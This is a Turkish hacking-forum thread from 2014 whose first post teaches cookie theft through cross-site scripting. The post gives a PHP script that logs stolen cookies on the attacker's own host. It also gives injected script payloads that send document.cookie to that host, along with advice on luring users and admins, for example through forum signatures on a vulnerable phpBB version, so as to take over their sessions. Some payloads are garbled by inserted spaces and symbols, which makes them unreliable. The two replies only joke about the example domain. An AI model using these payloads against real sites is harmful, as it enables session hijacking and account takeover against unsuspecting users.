THT DUYURU

chat
Seçenekler

XSS Cookie Çalma Yöntemiyle Hacking

RhyRed - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Nereden:
Mersin
Mesajlar:
246
Konular:
66
Teşekkür (Etti):
9
Teşekkür (Aldı):
38
Ticaret:
(0) %
27-01-2014 13:40
#1
XSS Cookie Çalma Yöntemiyle Hacking
Öncelikle Cookie nedir ne işe yarar kısa bir açıklama ile konuya girmek istiyorum. Cookie nette gezinirken kullandığınız web sitelerinin sizi tanımasını sağlayan .txt uzantılı web kimliğinizdir. Bir çok mail girişinde veyahut forum girişlerinde "Beni Hatırla" seçeneğini görmüşsünüzdür mutlaka. Bu gibi işlemler kullandığınız tarayıcılar ("IE, Mozilla" gibi) bilgisayarınıza kaydederek aynı siteye birdahaki girişlerinize sizi otomatik olarak tanımanıza yardımcı olur. Bu dosyalar aynı zamanda bir forumda user mı yoksa admin olduğumuzu da tanımlayan dosyalardır.

Cookie çalmakla elde etmek istediğimiz amaç kendi user kimliğimizi hacklemek istediğimiz admin kimliğine dönüştürmektir diyebiliriz.


COOKIE’Yi Nasıl Çalarız..

Cookie çalma olayı için öncelikle hacklemek istediğimiz web sitesi üzerindeki açıkları taramamız gerekir. Buna örnek olarak site içerisinde html/java/swf gibi açıkları kullanabileceğimiz yerler olmakla birlikte İmza altına atılan, ya da avatar bölümünden kullanabileceğimiz bir kod da olabilir.

En basitinden <sc r ipt>javascript*alert ZararliKod * do cu ment.cookie);</script>javascript*alert ZararliKod*d o cu m e nt.cookie);</script> java dilinde yazılan uyarı kodu ile cookie parametresini birleştirirsek o anki cookinizi ekrana yansıtır. Tabi bu olay sizin ne kadar tecrübeli olduğunuza ya da web dilleri bilginize bağlıdır.



Örnek:

Basit yazılmış bir script ile cookie’nin loglanmasını sağlayabiliriz. Açığın olduğu yere birazdan vereceğim kodu enjekte ederek scripti istemeden çalıştıran birinin cookie bilgilerini alabiliriz. Bunu direk link vererekte yapabilirsiniz yalnız karşınızdaki biraz kurnaz ise herhangi bir yolla bu kodu yutturmanızgerekiyor. Yani bu sizin hayal gücünüze kalmış. Özellikle bunu çoğu forumda ya da kişiselweb sitelerinde frame içinde yutturmanızda mümkün.

Kod:

Kod:
<?php
 $filename = getcwd()."\\\\loglarburaya.txt";


 if(!file_exists($filename)){
 touch($filename);
 chmod($filename, 0666);
 }

 if (isset($_GET["cookie"]))
 {
   if (!$handle = fopen($filename, ’a’))
   {
     echo "Hata: Loglar dosyaya kaydedilemedi!";
     exit;
   }
   else
   {
     if (fwrite($handle, "\\r\\n" . $_GET["cookie"]) === FALSE)
     {
       echo "Hata: Loglar dosyaya kaydedilemedi!";
       exit;
     }
   }
   echo "Log başarıyla girildi...";
   fclose($handle);
   exit;
 }
 echo "Hani loglayacağımız parametre?";
 exit;
?>
Yukarıda php diliyle yazılmış bir script görüyorsunuz. Bu script cookie’yi loglamaya yarayacak.Bu kodu öncelikle farklı kaydet deyip .php uzantılı olarak kaydediyoruz. Kendinize ait bir hosta atıyorsunuz.

Açıklamalar:

loglarburaya.txt: Yeni bir .txt belgesi oluşturarak logları buraya yazın. Cookie’nin yazılabilmesi için mutlaka CHMOD’unun 777 yani yazma izinli olması gerekiyor.

Cookie’yi çalma kodu:


Kod:

Kod:
<sc ri pt>window.navigate("http://siteniz.com/cookie.php?cookie=+do cu ment.cookie)</script>
Şimdi hacklemek istediğimiz sitedeki açıkları denemeye geliyoruz.
Örneğin elimizde www.xxx.com/oyun.asp?id

Biz bunu önceki verdiğim örnek kodla deniyoruz;

Kod:
javascript*alert ZararliKod*documen">www.xxx.com/oyun.asp?id=
javascript*alert ZararliKod*documen t.cookie);</script>
Öncelikle bakmamız gereken sitede <; gibi taglar yasaklanmış mı. Şayet yasaklanmamış ise işimize koyuluyoruz. Eğer fazla oyalanırsanız zaman aşımından script etkisiz hale gelebilir o yüzden elinizi çabuk tutmakta yarar var.

Baktık açığımız var. Burdan bir şekilde frame ile kullancıyı buraya sokturmamız gerekiyor. Yani Xss açığı olan yere.


Kod:

Kod:
window.navigate(http://siteniz.com/cookie.php?cookie=+do cu ment.cookie)http://www.xxx.com/oyun.asp?id=</sc ript>window.navigate(http://siteniz.com/cookie.php?cookie=+do cu ment.cookie)</script>
Kullanıcı ya da admin bu adrese girdiğinde cookileri size gelecektir. Bu yöntemi forumlarda kullanabilirsiniz. Phpbb 2.0.16 Xss açığı ile imzaya eklediğiniz kod ile konunuza bakan tm kullanıcların cookieleri siz gelecektir. XSS geleceğin en tehlikeli açıklarından bunu söylemek yanlış olmaz çünkü bu açık sayesinde kafanıza kullanarak mail, wap serverlerına girmeniz bile mümkün gerisi sizin hayal gücünüze kalmış..
Konu RhyRed tarafından (27-01-2014 13:50 Saat 13:50 ) değiştirilmiştir.
heacker1102 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
12/2012
Nereden:
www
Yaş:
18
Mesajlar:
1.724
Konular:
170
Teşekkür (Etti):
89
Teşekkür (Aldı):
361
Ticaret:
(0) %
03-02-2014 20:14
#2
xxx.com ayıp site
Kloasy - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
193
Konular:
9
Teşekkür (Etti):
66
Teşekkür (Aldı):
10
Ticaret:
(0) %
04-02-2014 14:32
#3
Abi adam örnek vermiş sen de girip baktın mı Kahkaha attım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler